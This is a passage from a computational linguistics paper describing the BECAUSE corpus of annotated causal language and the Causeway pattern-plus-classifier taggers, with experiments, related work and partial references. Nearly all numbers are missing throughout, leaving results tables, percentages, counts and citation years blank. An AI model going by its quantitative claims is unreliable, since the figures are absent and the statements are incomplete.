relationship – e.g., the earthquakes have been linked to fracking. • temporal language – e.g., after i drank some wa- ter, i felt much better. (relations like temporal or- der are often repurposed to express causality. we are currently developing an enhanced annotation scheme and corpus that accounts for such cases.) additionally, for practical reasons, arguments are only annotated when they appear within the same sentence as the connective. the scheme labels four different types of causa- tion: consequence, motivation, purpose, and inference. it also distinguishes positive causation (facilitate) from negative causation (inhibit). our algorithms do not currently make these distinc- tions, so we do not delve into them here. of course, this scheme does not supply everything a full natural language understanding pipeline would need regarding causal relationships. the scheme does not unpack the argument spans into a richer semantic representation. it also does not cover predi- cates that imply causation, such as kill or convince. instead, it follows in the tradition of shallow semantic parsing, imposing a canonical representation for cer- tain predicates that abstracts away from the language used to convey them. the shallow semantic pars- ing paradigm enables many applications that only require relevant text spans. it is also the first step towards a full semantic interpretation that includes interpretations of the arguments. . the because annotated corpus based on the data and annotation scheme from duni- etz et al. ( ), we developed the bank of effects and causes stated explicitly (because), which was used for all experiments below. it consists of three sets of exhaustively annotated documents: • randomly selected articles from the year in the washington section of the new york times corpus (sandhaus, ) • documents randomly selected from sections – of the penn treebank (marcus et al., ) • sentences transcribed from congress’ dodd- frank hearings, taken from the nlp unshared task in poliinformatics (smith et al., ) the corpus contains a total of sentences, among which are labeled instances of causal language. of these, or %, include both cause and effect arguments. many of these documents are the same ones that were annotated in dunietz et al. ( ), with mi- nor corrections. about % of the data is new, but we excluded wsj documents that were either earnings re- ports or corporate leadership/structure announcements, as both tended to be merely short lists of names/numbers. the remaining sentences and documents were not annotated due to constraints on available annotation effort. partial overlap: allowed excluded connectives (f ) . . degrees (κ) . . causation types (κ) . . argument spans (f ) . . argument labels (κ) . . table : inter-annotator agreement results for the be- cause corpus. the difference between the two columns is that for the left column, we counted two annotation spans as a match if at least a quarter of the larger one overlapped with the smaller; for the right column, we re- quired an exact match. κ scores indicate cohen’s kappa. each κ score was calculated only for spans that agreed (e.g., degrees were only compared for matching connec- tive spans). corpus connectivetypes connective tokens pdtb . % . % mirza and tonelli ( ) . % . % framenet . % . % table : percentages of the causal connectives in be- cause that would be partially or fully annotatable under other annotation schemes. connectives were grouped into types by the sequence of connective lemmas. annotated by the same annotators. the scheme’s inter-annotator agreement metrics are reproduced in table . many of the causal constructions in because would be harder to annotate in other schemes, as shown in table . we computed these statistics by looking up each connective in the other schemes’ lexica. framenet captures many more connectives than the others, but it often represents them in frames that are not linked to causality, making comparison difficult. the causal language tagging task we define the task of tagging causal language to be reproducing a subset of the annotations of the because annotation scheme. we split this task into two parts: . connective discovery, in which the spans of causal connectives are annotated. a connective span may be any set of tokens from the sentence. this can be thought of as recognizing instantia- tions of causal constructions. . argument identification (or argument id), in which cause and effect spans are identified for each causal connective. this can be thought of as identifying the causal construction’s slot-fillers. we assume as input a set of sentences, each with pos tags, lemmas, ner tags, and a syntactic parse in the universal dependencies (ud; nivre et al., ) scheme, all obtained from version . . of the stan- ford parser (klein and manning, ). this task is defined in terms of text spans. still, to achieve a high score on it, a tagger must respond to the meaning of the construction and arguments in context, just as annotators do. this may be achieved by analyzing indirect cues that correlate with mean- ing, such as lexical information, dependency labels, and tense/aspect/modality information. compared to the annotation scheme, the task is limited in two important ways: first, we do not dis- tinguish between types or degrees of causation; and second, we only tag instances where both the cause and the effect are present. (even for connective dis- covery, we only evaluate on instances where both arguments are present, and our algorithms check for spans or tokens that at least could be arguments.) we leave addressing both limitations to future work. nonetheless, this task is more difficult than it may appear. two of the reasons for this are familiar is- sues in nlp. first, there is a surprisingly long tail of causal constructions (as we finished annotating, we we use the non-collapsed enhanced dependency represen- tation. we could have selected a parser that produces both syn- tactic and semantic structures, such as the english resource grammar (erg; copestake and flickinger, ) or another hpsg variant. though these parsers can produce impressively sophisticated analyses, we elected to use dependency parsers because they proved significantly more robust; there were many sentences in our corpus that we could not parse with erg. how- ever, incorporating semantic information from such a system when it is available would be an interesting extension for future work. another possible input would have been semantic role label- ing (srl) tags. srl tags could not form the basis of our system the way syntactic relations can, because they only apply to lim- ited classes of words (primarily verbs). also, by examining syntactic relations and undoing passives (see §), we get most of the information srl would provide. still, we may include srl tags as classification features in the future. would still encounter a new construction every – documents). second, recognizing these constructions inherits all the difficulties of word sense disambigua- tion; every one of the connectives in table except examples and has a non-causal meaning. ( can be used in a discourse sense – roughly, i’m saying this because. . . .) the third reason arises from the com- plexity of causal constructions. because we allow arbitrarily complex connectives, the space of possible triggers is all subsets of words in the sentence. thus, the task demands an approach that can trim this space down to a manageable size. causeway: causal construction tagging methods causeway is a system that performs this causal lan- guage tagging task. we implemented two versions of causeway: causeway-s, based on syntactic patterns, and causeway-l, based on lexical patterns. (these are both simple techniques; see § for some more complex possibilities we are considering for future work.) each technique is implemented as a pipeline with four stages: . pattern-based tentative connective discovery. both techniques extract lexical or lexico-syntactic patterns for connectives from the training data. these patterns are then matched against each test sentence to find tokens that may be participating in a causal construction. . argument identification, which marks the cause and effect spans. . a statistical filter to remove false matches. . a constraint-based filter to remove redundant connectives. smaller connectives like to (which is causal in sentences like i left to get lunch) are usu- ally spurious when a larger connective includes the same word, like cause x to y . when a larger and a smaller connective both make it through stage together, we remove the smaller one. because argument id is done before filtering, the arguments output by stage do not quite represent the cause and effect arguments of a causal instance. following schneider et al. ( ), because considers the “in order to” usage of the infinitive to to carry lexical meaning beyond just marking an infinitival clause. worry/vbp i/prp nsubj care/vbp i/prp nsubj because/in mark advcl figure : a ud parse for the sentence i worry because i care, with the tree fragment corresponding to the because construction bolded. bolded nodes with unbolded text indicate the slots in the construction. (care is a dependent of worry in keeping with the ud design philosophy, which maximizes dependencies between content words.) rather, they represent what the cause and effect spans would be if the connective is indeed causal. (for the same reason, even connective discovery is not complete until the end of the pipeline.) of course, we lack gold-standard arguments for false-positive connectives. we therefore train argument id only on instances whose connectives are correct. we now describe each of the two versions of this pipeline in turn, focusing on their differing first and second stages. we also elaborate on the design of the classifier. throughout, we take the head of a span to be the token that is highest in the dependency tree. for tokens that are equally high (e.g., if the parser erroneously splits a phrase into two sister subtrees), we prefer verbs or post-copular nouns over other nouns, and nouns over other parts of speech. . causeway-s: syntax-based tagging the syntax-based approach relies on a simple intu- ition: each causal construction corresponds, at least in part, to a fragment of a dependency tree, where several nodes’ lemmas and pos tags are fixed (see figure ). accordingly, the first stage of causeway-s induces lexico-syntactic patterns from the training data. at test time, it matches the patterns against new dependency trees to identify possible connectives and the putative heads of their cause and effect argu- ments. the second stage then expands these heads into complete argument spans. tregex pattern matching for pattern matching, we use tregex (levy and andrew, ), a grep-inspired utility for matching patterns against syntax trees. during training, the sys- tem examines each causal language instance, gener- ating a tregex pattern that will match tree fragments with the same connective and argument structure. in the example from figure , the generated pattern would match any tree meeting three conditions: • some token t has a child t via a dependency labeled advcl • t has a child t via a dependency labeled mark • t has the lemma because and a pos tag of in at test time, tregex matches these extracted pat- terns against the test sentences. continuing with the same example, we would recover t as the effect head, t as the cause head, and {t } as the connective. tregex is designed for phrase-structure trees, so we transform each dependency tree into a ptb-like parenthetical notation (see levin et al., ). patterns involving verbs vary systematically: the verbs can become passives or verbal modifiers (e.g., the disaster averted last week), which changes the ud dependency relationships. to generalize across these, we crafted a set of scripts for tsurgeon (levy and andrew, ), a tree-transformation utility built on tregex. the scripts normalize passive verbs and past participial modifiers into their active forms. each sentence is transformed before pattern extrac- tion or matching. tregex pattern extraction the algorithm for extracting tregex patterns first preprocesses all training sentences with tsurgeon. next, for each causal instance with both a cause and an effect, it uses the dreyfus-wagner algorithm (dreyfus and wagner, ) to find a minimum- weight subtree of the dependency graph that includes the connective, the cause head, and the effect head. the algorithm uses this to build the pattern: for each subtree edge rel(a,b), the pattern requires that the test sentence include nodes related by a dependency labeled as rel. if a or b is a connective word, then the pattern also checks for its lemma and pos in the test sentence nodes. patterns with more than six non-argument, non-connective nodes are discarded as parse errors or otherwise ungeneralizable flukes. the graph for dreyfus-wagner includes a directed the actual tregex pattern encoding these conditions is: /ˆbecause [ - ]+$/=connective < /ˆin.*/ < mark >(/.* [ - ]+/=cause < advcl >(/.* [ - ]+/=effect)). edge for each dependency in the sentence’s parse tree. for each edge, a back-edge of equal weight is added, unless the back-edge already exists (which ud allows). this allows dreyfus-wagner to find a subtree even when it has to follow an arc in reverse to do so. most edges have unit weight. however, for nodes with multiple parents (which ud also allows), the algorithm would often choose the wrong dependency path, leading to poor generalization. accordingly, on paths of the form x xcomp−−−→ y csubj | nsubj−−−−−−−→ z (where xcomp indicates open clausal complements), edge costs are slightly decreased. this helps the algorithm prefer the xcomp path connecting x, y, and z, rather than a path such as x nsubj−−−→ z nsubj←−−− y. similarly, acl (adjectival clause) and expl (expletive) edges are slightly penalized. syntax-based argument identification each syntactic pattern inherently encodes the posi- tions in the tree of the cause and effect heads. thus, matching these patterns is the first step of argument id, in addition to (tentative) connective discovery. the second step of argument id is to expand the ar- gument heads into complete spans. in general, most syntactic dependents of an argument’s head are in- cluded in its span. there are two exceptions: . connective words. under the ud scheme, words that form part of the connective sometimes appear as dependents of the argument head. for example, in a prevents b from c, from appears as a depen- dent of c, but it is really part of the construction for the verb prevent. following the annotation scheme, we therefore exclude such connective words (and any of their dependents) from the ar- gument span. . words below the head of the other argument. for example, in a because b, b will be a depen- dent of a (see figure ). obviously, however, it should not be included in the cause span. . causeway-l: lexical pattern-based tagging syntactic parsers often make mistakes, which be- comes especially relevant for syntactic patterns that examine multiple dependencies. this is particularly problematic for the syntax-based pipeline, for which parse errors, either in training or at test time, can prevent patterns from matching. additionally, the exact syntactic relations present in a given instance may be altered by the presence of other constructions. for example, if a verb appears as a complement of another verb, the path to the subject will have an additional dependency link. we therefore implemented a second algorithm, causeway-l, that performs connective discovery based on the sequence of word lemmas and parts of speech: instead of extracting and matching parse patterns, it extracts and matches regular expressions. it then uses a conditional random field to label the argument spans, using features from the parse in a more probabilistic way. connective discovery with regular expression patterns at training time, we generate regular expressions that will match sequences of connective and argu- ment lemmas. the regexes also make sure that there are tokens in the correct lexical positions for argu- ments. for instance, upon seeing an example like a because b, it would generate a pattern that matches any sequence of lemmas (the effect range), followed by the lemma because with pos tag in (the connec- tive), followed by any other sequence of lemmas (the cause range). each subpattern is given its own cap- turing group in the regular expression. at test time, each new sentence is turned into a string of lemmas with pos tags for matching. matching lemmas can be recovered from the capturing groups. argument identification with a crf unlike syntactic patterns, regular expressions can- not pinpoint the cause and effect arguments; they can only give ranges within which those arguments must appear. thus, the argument id stage for this pipeline starts with much less information. we treat the task of argument id as a sequence labeling problem: given a particular regex-derived connective, the system must identify which tokens are in the cause, which are in the effect, and which are neither. we use a standard linear-chain crf for this task, implemented with the crfsuite library. the actual regular expression that encodes this is: (ˆ| )([\s]+ )+?(because/in) ([\s]+ )+?. http://www.chokkan.org/software/ • the lemma of wi • the pos tag of wi • whether wi ∈ c • the dependency parse path between wi and the token in c that is closest in the parse tree • the absolute lexical distance between wi and the lexically closest token in c • the signed lexical distance between wi and the lexically closest token in c • whether wi is in the parse tree (false for punctua- tion and several other non-argument token types) • the regex pattern that matched c • the cross-product of the regex pattern feature and the parse path feature • the position of wi relative to c • whether the lemma of wi is alphanumeric table : features used for crf argument id. for each pos- sible connective c (a set of tokens), features are extracted from each word wi in the sentence. all non-numeric fea- tures are binarized. the features for argument id are listed in table . . voting classifier for filtering the pattern-matching stage overgenerates for two reasons. first, due to ambiguity of both words and constructions, not all instances of a given pattern are actually causal. since, for example, has both causal and temporal senses, which are not distinguished either lexically or syntactically. second, the patterns do not filter for important constructional elements like tense and modality (e.g., example in table requires modality of necessity in the cause). thus, pattern matching alone would yield high recall but low precision. to account for this, the final stage of both pipelines is a filter that determines whether each possible con- nective instance, along with its arguments, is in fact being used in a causal construction. this classification task is somewhat, but not en- tirely, heterogeneous. some aspects are universal – there are regularities in what typically causes what – crfsuite/. we use the python-crfsuite wrapper (https: //github.com/tpeng/python-crfsuite/). for this purpose, we represent the tense of a verb as the pos of the verb plus the string of auxiliaries attached to it. the tense of a non-verb is null. for copulas, both the pos of the copula and the pos of its object are included. connective features: • the label on the dependency from h to its parent • the part of speech of h’s parent • the sequence of connective words* • the sequence of connective lemmas* • each pattern that matched the connective* argument features: • the pos tags of c and e • the generalized pos tags of c and e (e.g., n for either nnp or nns) • the tenses of c and e, both alone and conjoined • the label on each child dependency of c and e • for verbs, the set of child dependency labels • the number of words between c and e • the dependency path between c and e • the length of the dependency path from c to e • each closed-class child lemma of e and of c • the domination relationship between c and e (dominates, dominated by, or independent) • the sets of closed-class child lemmas of e and c • the conjoined ner tags of c and e • initial prepositions of the cause/effect spans, if any • each pos -skip- -gram in the cause/effect spans • each lemma -skip- -gram in the cause/effect spans that was seen at least times in training • each wordnet hypernym of c and e† table : features for the causal language candidate filter. c indicates the cause head, e the effect head, and h the connective head. all non-numeric features are binarized. * used only for per-connective classifiers. † used only for the global classifier. while others are construction-dependent. to incorpo- rate both kinds of information, a separate soft-voting classifier is created for each unique sequence of con- nective words. each classifier averages the proba- bility estimates of three less-reliable classifiers: a global logistic regression classifier, which is shared between all connectives; a per-connective logistic regression classifier; and a per-connective classifier that chooses the most frequent label for that connec- tive. our classifier thus differs slightly from typical voting classifiers: rather than the ensemble consisting of multiple algorithms trained on the same data, our ensemble includes one generalist and two specialists. we use the scikit-learn . . (pedregosa et al., ) implementation of logistic regression with l regularization and balanced class weights. the logis- tic regression classifiers consider a variety of features derived from the matched pattern, the connective words matching, the argument heads, and the parse tree (see table ). an instance is tagged as causal if the soft vote assigns it a probability above . . this cutoff, close to the prior of . , was tuned for f on a different random split of the data than was used in the experiments below. in our experiments, the cutoff made little difference to scores. experiments . baselines our task differs significantly from existing tasks such as frame-semantic parsing, both in the forms of al- lowable triggers and in the semantic relationships tar- geted. our results are therefore not directly compara- ble to a frame-semantic parsing baseline. instead, we compare our end-to-end results against an argument- aware most-frequent-sense (mfs) baseline. at training time, the baseline first extracts the set of sequences of connective lemmas – i.e., {〈prevent, from〉,〈because, of〉, . . .}. it then builds a table t with one entry for each combination of con- nective and argument parse path, recording how many more times it has been causal than non-causal. for example, consider the sentence the flu pre- vented me from attending. after finding that prevent and from are present in the correct order, the baseline considers every pair (c,e) of non-connective words within a parse radius of two links from the connec- tive. each (c,e) is considered a possible cause/effect head pair for prevent from. for each pair, it finds the shortest path of dependency links from either prevent or from to c and e (call these paths dc and de). if prevent from is annotated as causal, with cause head c and effect head e, the system increments the count t{prevent from,dc,de}; otherwise, it decrements it. the test algorithm finds the same set of possible (connective, cause head, effect head) tuples in the test sentence. for each tuple, if the corresponding entry in t is greater than , the system tags a causal language instance. argument heads are expanded into spans using the algorithm from causeway-s. in addition to an end-to-end baseline, we wished to test how helpful our three-way voting classifier is. for each pipeline, then, we also compare that classifier against a most-frequent-sense baseline that chooses the most frequent label (causal or not-causal) for each connective, with connectives differentiated by their lemma sequences. the baseline classifier has no access to any information about the arguments. . experiment : pipeline comparison in this experiment, we measured the performance of causeway-s, causeway-l, and the baseline on the tasks of connective discovery and argument id. we also tried taking the union of each system’s outputs with the baseline’s. because of the small size of because, we report averaged metrics from -fold cross-validation, with fold size measured by sentence count. all pipelines were run on the same folds. evaluation metrics for connective discovery, we report precision, re- call, and f for connectives, requiring connectives to match exactly. in counting true positives and false negatives, the only gold-standard instances counted are those with both a cause and an effect, in keeping with the task definition. for argument id, we split out metrics by causes and effects. for each, we report: • percent agreement on exact spans • percent agreement on heads • the average jaccard index (jaccard, ) for gold-standard vs. predicted spans, defined as j(a,b) = |a∩b| |a∪b| , where a and b are the sets of tokens in the two spans. this metric reflects how well the argument spans overlap when they do not match exactly. all argument metrics are reported only for correctly predicted connectives, as there is no way to auto- matically evaluate argument spans for false positives. note that as a result, argument id scores are not directly comparable between pipelines – the scores represent how well argument id works given the previous stage, rather than in an absolute sense. we use the same metrics for experiments and . . experiment : ablation studies our second experiment explores the impact of vari- ous design choices by eliminating individual design elements. we report results from using the global and connective-specific classifiers on their own, with- out the soft-voting ensemble. (the mfs classifier is tested alone as part of experiment .) we also report results from the ensemble classifier without using any features that primarily reflect world knowledge: ner tags, wordnet hypernyms, and lemma skip-grams. . experiment : effects of parse errors in our third experiment, we examined the effects of parse errors on our pipelines’ performance. we com- pared each pipeline’s performance with and without gold-standard parses, using only the penn treebank portion of because. for gold-standard runs, we used the stanford dependency converter (de marn- effe et al., ) to convert the gold parses into de- pendency format. we report averaged results from -fold cross-validation on this subcorpus. experimental results and analysis . experiment results results from experiment are shown in table . our most important conclusion from these results is that a classifier can indeed learn to recognize many of the subtleties that distinguish causal constructions from their similar non-causal counterparts. even our end-to-end baseline offers moderate performance, but causeway-l outperforms it at connective discovery by over f points, and causeway-s outperforms it by points. the design of the filter is a significant contrib- utor here. the mfs classifier alone substantially underperforms the voting classifier, particularly for the syntactic pipeline. the small connectives filter makes up some of the difference, but the full pipeline still beats the mfs filter by . points for the lexical system and . points for the syntax-based system. when our pipelines are combined with the end-to- end baseline, the results are better still, beating the baseline alone by . points. this supports our hy- pothesis that causal construction recognition rests on a combination of both shallow and deep information. as expected, both pipelines show high recall but low precision for the connective discovery stage. (much of the remaining gap in recall came simply from the long tail of constructions – about half of connective types never saw a pattern match.) the filter does balance out precision and recall for a bet- ter f . however, as the filter’s steep drop in recall suggests, more work is needed to upweight positive instances. examining the classifier scores reveals that the filter is doing a good job of assigning low probability to negative instances: the vast majority of false pattern matches are clustered below a probabil- ity of . , whereas the positives are peppered more evenly over the probability spectrum. unfortunately, the positives’ probabilities are not clustered on the high end, as they should be. significant leverage could be gained just from im- proving classification for the connective to. for both pipelines, this one connective accounted for – % of end-to-end false positives and false negatives, and nearly half of all misclassifications by the filter. many of the remaining errors (about %) came from just a few simple but highly ambiguous/polysemous con- nectives, including if, for, and so. for complex con- structions (mwes or more complex syntactic struc- tures), causeway-l achieved % f and causeway- s achieved %. overall, then, it seems that the classifier is doing well even at the cases that would challenge typical semantic parsing systems, but it needs some features that will allow it to upweight positive instances of a few challenging words. for argument id, both techniques do reasonably well at recovering exact argument spans, and the hc and he columns show that even when the exact spans do not match, the key content words are mostly correct. the low jaccard indices, meanwhile, indi- cate that there is plenty of room for improvement in finding not just heads, but full spans. interestingly, effects seem to be harder to recover than causes. the likely culprit is the difference in lengths between the two types of arguments. the distribution of cause lengths is skewed toward low numbers, with a peak at and a median of , while effects have a smoother peak at with a median of (figure ). the difference makes it harder for the system to guess full effect spans, and even for heads there are more plausible options. the length dispar- ity, in turn, is probably due to the fact that causes are likely to be subjects ( %) or nominal modifiers ( %), which skew short, whereas most effects are primary clauses ( %), complements ( %), or direct objects ( %), which are often more complex. . experiment results results for experiment are shown in table . the results using single classifiers, rather than an connectives causes effects pipeline p r f sc hc jc se he je causeway-s w/o classifier . . . . . . . . . causeway-s w/ mfs . . . . . . . . . causeway-s w/ mfs + sc filter . . . . . . . . . causeway-s w/ classifier . . . . . . . . . causeway-s w/ classifier + sc filter . . . . . . . . . causeway-l w/o classifier . . . . . . . . . causeway-l w/ mfs . . . . . . . . . causeway-l w/ mfs + sc filter . . . . . . . . . causeway-l w/ classifier . . . . . . . . . causeway-l w/ classifier + sc filter . . . . . . . . . baseline . . . . . . . . . baseline + causeway-s . . . . . . . . . baseline + causeway-l . . . . . . . . . table : results for experiment . sc and se indicate exact span match for causes and effects, respectively; hc and he indicate percentage accuracy for cause and effect heads; and jc and je indicate cause and effect jaccard indices. “sc filter” indicates the filter for smaller overlapping connectives. for the combinations of the baseline with causeway, the union of the baseline’s and causeway’s outputs was passed to the sc filter. argument length (in tokens) c ou nt causes effects figure : distributions of cause and effect span lengths in the because corpus (for instances with both arguments). ensemble, uphold our design of combining multiple information sources. even the best non-ensemble filter, the per-connective filter in causeway-s, under- performs its ensemble counterpart by . points. likewise, the results from removing world- knowledge features confirm that this knowledge sig- nificantly assists the classifier beyond what surface- level features alone can provide. world knowledge features add . points for causeway-l and . points for causeway-s. . experiment results from experiment are shown in table . as expected, causeway-s improved significantly with gold-standard parses, whereas causeway-l gets only a tiny boost. surprisingly, causeway-s did not improve from better tregex matching of connectives per se. in fact, all scores for connective matching from the first stage were worse with gold-standard parses. instead, the improvement appears to come from argument identification: better parses made it easier to identify argument heads, which in turn made the many features based on those heads more reliable. this is supported by the high argument head accuracy with gold parses. further, when we ran the baseline on the ptb subcorpus with and without gold parses, we saw a similar improvement. thus, although the limited data and the classifier’s failure to upweight positives are still the primary handicaps, better parses would be somewhat helpful for at least the syntax-based approach. related work our work is of course based on cxg, which has inspired a number of nlp efforts. on the language- resource side, the framenet group, noting the many aspects of meaning that are not fully captured in an analysis of lexical triggers, has begun an extensive project to document and annotate grammatical con- connectives causes effects pipeline classifiers ablated p r f sc hc jc se he je causeway-s – . . . . . . . . . causeway-s both per-connective . . . . . . . . . causeway-s global/most-freq. . . . . . . . . . causeway-s knowledge features . . . . . . . . . causeway-l – . . . . . . . . . causeway-l both per-connective . . . . . . . . . causeway-l global/most-freq. . . . . . . . . . causeway-l knowledge features . . . . . . . . . table : results for experiment . unablated full-pipeline results from table are included for comparison. (a) with automatically parsed data connectives causes effects pipeline p r f sc hc jc se he je causeway-s w/o classifier . . . . . . . . . causeway-s w/ classifier + sc filter . . . . . . . . . causeway-l w/o classifier . . . . . . . . . causeway-l w/ classifier + sc filter . . . . . . . . . (b) with gold-standard parses connectives causes effects pipeline p r f sc hc jc se he je causeway-s w/o classifier . . . . . . . . . causeway-s w/ classifier + sc filter . . . . . . . . . causeway-l w/o classifier . . . . . . . . . causeway-l w/ classifier + sc filter . . . . . . . . . table : results for experiment . structions in english (fillmore et al., ). similar efforts are underway for verbnet (bonial et al., ) and propbank (bonial et al., ). on the nlp- tools side, some work has been done on parsing text directly into constructions, particularly through the formalisms of fluid construction grammar (steels, ) and embodied construction grammar (bergen and chang, ), which take a “constructions all the way down” approach. some hpsg parsers and formalisms, particularly those based on the english resource grammar (copestake and flickinger, ; flickinger, ) or sign-based construction gram- mar (boas and sag, ), also take constructions into account. thus far, however, only a few attempts (e.g., hwang and palmer, ) have been made to integrate constructions with robust, broad-coverage nlp tools/representations. other aspects of our work are more closely related to previous nlp research. our task is similar to frame-semantic parsing (baker et al., ), the task of automatically producing framenet annotations. lexical triggers of a frame correspond roughly to our causal connectives, and both tasks require iden- tifying argument spans for each trigger. the tasks differ in that framenet covers a much wider range of semantics, with more frame-specific argument types, but its triggers are limited to lexical units, whereas we permit arbitrary constructions. our multi-stage approach is also loosely inspired by semafor and subsequent framenet parsers (das et al., ; roth and lapata, ; täckström et al., ). several representational schemes have incorpo- rated elements of causal language. pdtb includes reason and result relations; framenet frames often include purpose and explanation roles; preposition schemes (e.g., schneider et al., , ) include some purpose- and explanation-related senses; and verbnet and propbank include verbs of causation. as described in § , however, none of these covers the full range of linguistic realizations of causality. the asfalda french framenet project recently proposed a reorganized frame hierarchy for causality, along with more complete coverage of french causal lexical units (vieu et al., ). some constructions would still be too complex to represent, but under their framework, many of our insights could likely be merged into mainline english framenet. other projects have attempted to address causality more specifically. for example, a small corpus of event pairs conjoined with and has been annotated as causal or not causal (bethard and martin, ), and a classifier was built for such pairs (bethard et al., ). the caters annotation scheme (mostafazadeh et al., ), based on timeml, also includes causal relations, but from a commonsense reasoning standpoint rather than a linguistic one. a broader-coverage linguistic approach was taken by mirza and tonelli ( ). they enriched timeml to include causal links and their lexical triggers, and built an svm-based system for predicting them. their work differs from ours in that it requires argu- ments to be timeml events; it requires connectives to be contiguous spans; and their classifier relies on gold-standard timeml annotations. more recently, hidey and mckeown ( ) au- tomatically constructed a large dataset with pdtb- style altlex annotations for causality. using this cor- pus, they achieved high accuracy in finding causality indicators. this was a somewhat easier task than ours, given their much larger dataset and that they limited their causal triggers to contiguous phrases. their dataset and methods for constructing it, how- ever, could likely be adapted to improve our systems. our pattern-matching techniques are based on ear- lier work on lexico-syntactic patterns. these patterns, similarly represented as fragments of de- pendency parse trees with slots, have proven useful for hypernym discovery (hearst, ; snow et al., ). they have also been used both for the more limited task of detecting causal verbs (girju, ) and for detecting causation relations that are not ex- clusively verbal (ittoo and bouma, ). our work extends this earlier research in several ways. we propose several methods (crf-based ar- gument id and statistical classifiers) for overcoming the ambiguity inherent in such patterns. we also take care to ground our notion of causality in a princi- pled annotation scheme for causal language. this avoids the difficulties of agreeing on what counts as real-world causation (see grivaz, ). conclusion and future work with this work, we have demonstrated the viability of two approaches to tagging causal constructions. we hope that the constructional perspective will prove applicable to other domains, as well. our code and corpus are available at https://github.com/ duncanka/causeway and https://github. com/duncanka/because, respectively. in the immediate future, we plan to explore more sophisticated, flexible algorithms for tagging causal constructions that rely less on fixed patterns. two promising directions for flexible matching are tree kernels and parse forests (tomita, ). we are also pursuing a neural, transition-based tagging model. in parallel, we are working to extend our ap- proaches to cases where causality is expressed using temporal language or other overlapping relations. we are developing a further expanded corpus that will include annotations for such cases, and we expect to extend our algorithms to these new annotations. in the longer run, we plan to demonstrate the use- fulness of our predicted causal language annotations for an application-oriented semantic task such as question-answering. acknowledgments we thank jeremy doornbos, donna gates, nora ka- zour, chu-cheng lin, michael mordowanec, and spencer onuffer for all their help with refining the an- notation scheme and doing the annotation work. we are also grateful to nathan schneider for his invalu- able suggestions, and to the anonymous reviewers and tacl editors for their useful feedback. references collin baker, michael ellsworth, and katrin erk. . semeval’ task : frame semantic struc- ture extraction. in proceedings of the th interna- tional workshop on semantic evaluations, pages – . association for computational linguis- tics, prague, czech republic. collin f. baker, charles j. fillmore, and john b. lowe. . the berkeley framenet project. in proceedings of the th international conference on computational linguistics, volume , pages – . association for computational linguistics, montreal, canada. timothy baldwin and su nam kim. . multi- word expressions. in nitin indurkhya and fred j. damerau, editors, handbook of natural language processing, volume , pages – . crc press, boca raton, fl. jonathan berant, vivek srikumar, pei-chun chen, abby vander linden, brittany harding, brad huang, peter clark, and christopher d. manning. . modeling biological processes for read- ing comprehension. in proceedings of the conference on empirical methods in natural lan- guage processing (emnlp), pages – . association for computational linguistics, doha, qatar. benjamin bergen and nancy chang. . embod- ied construction grammar in simulation-based lan- guage understanding. construction grammars: cognitive grounding and theoretical extensions, : – . steven bethard, william j corvey, sara klingenstein, and james h. martin. . building a corpus of temporal-causal structure. in proceedings of the th international conference on language re- sources and evaluation (lrec ), pages – . european languages resources association, marrakech, morocco. steven bethard and james h. martin. . learning semantic links from a corpus of parallel temporal and causal relations. in proceedings of the th annual meeting of the association for computa- tional linguistics on human language technolo- gies (acl- hlt): short papers, pages – . association for computational linguistics, colum- bus, ohio. hans christian boas and ivan a. sag, editors. . sign-based construction grammar. csli publica- tions, stanford, ca. claire bonial, julia bonn, kathryn conger, jena d. hwang, and martha palmer. . propbank: se- mantics of new predicate types. in proceedings of the th international conference on language resources and evaluation (lrec ), pages – . european languages resources asso- ciation, reykjavik, iceland. claire bonial, susan windisch brown, jena d. hwang, christopher parisien, martha palmer, and suzanne stevenson. . incorporating coercive constructions into a verb lexicon. in proceedings of the acl workshop on relational models of semantics, pages – . association for com- putational linguistics, portland, oregon. juliette conrath, stergos afantenos, nicholas asher, and philippe muller. . unsupervised extrac- tion of semantic relations using discourse cues. in proceedings of the th international conference on computational linguistics (coling ), pages – . dublin city university and as- sociation for computational linguistics, dublin, ireland. ann a copestake and dan flickinger. . an open source grammar development environment and broad-coverage english grammar using hpsg. in proceedings of the nd international conference on language resources and evaluation (lrec ), pages – . european language re- sources association, athens, greece. dipanjan das, desai chen, andré f.t. martins, nathan schneider, and noah a. smith. . frame-semantic parsing. computational linguis- tics, ( ): – . marie-catherine de marneffe, bill maccartney, christopher d. manning, et al. . generat- ing typed dependency parses from phrase structure parses. in proceedings of the fifth international conference on language resources and evalua- tion (lrec ), volume , pages – . eu- ropean languages resources association, genoa, italy. stuart dreyfus and robert wagner. . the steiner problem in graphs. networks, ( ): – . jesse dunietz, lori levin, and jaime carbonell. . annotating causal language using corpus lexicog- raphy of constructions. in proceedings of the th linguistic annotation workshop (law ix), pages – . association for computational linguis- tics, denver, co. charles j. fillmore. . encounters with language. computational linguistics, ( ): – . charles j. fillmore, paul kay, and mary catherine o’connor. . regularity and idiomaticity in grammatical constructions: the case of let alone. language, ( ): – . charles j. fillmore, russell lee-goldman, and rus- sell rhodes. . sign-based construction gram- mar, chapter the framenet constructicon, pages – . in boas and sag ( ). dan flickinger. . accuracy vs. robustness in grammar engineering. in emily m. bender and jennifer e. arnold, editors, language from a cog- nitive perspective: grammar, usage, and process- ing, volume of csli lecture notes, pages – . csli publications. roxana girju. . automatic detection of causal relations for question answering. in proceedings of the acl workshop on multilingual summa- rization and question answering, volume , pages – . association for computational linguistics, sapporo, japan. adele goldberg. . constructions: a construc- tion grammar approach to argument structure. chicago university press, chicago, il. cécile grivaz. . human judgements on causa- tion in french texts. in proceedings of the th international conference on language resources and evaluation (lrec ), pages – . european languages resources association, val- letta, malta. marti a. hearst. . automatic acquisition of hy- ponyms from large text corpora. in proceedings of the th conference on computational linguis- tics, volume , pages – . association for computational linguistics, nantes, france. christopher hidey and kathleen mckeown. . identifying causal relations using parallel wikipedia articles. in proceedings of the th annual meeting of the association for computa- tional linguistics, pages – . association for computational linguistics, berlin, germany. jena d. hwang and martha palmer. . identifica- tion of caused motion constructions. in proceed- ings of the fourth joint conference on lexical and computational semantics (* sem ), pages – . association for computational linguistics, denver, co. ashwin ittoo and gosse bouma. . extracting explicit and implicit causal relations from sparse, domain-specific texts. in proceedings of the th international conference on natural language processing and information systems (nldb ’ ), pages – . springer-verlag, alicante, spain. paul jaccard. . the distribution of the flora in the alpine zone. new phytologist, ( ): – . dan klein and christopher d. manning. . ac- curate unlexicalized parsing. in proceedings of the st annual meeting on association for com- putational linguistics, volume , pages – . association for computational linguistics, sap- poro, japan. lori levin, teruko mitamura, davida fromm, brian macwhinney, jaime carbonell, weston feely, robert frederking, anatole 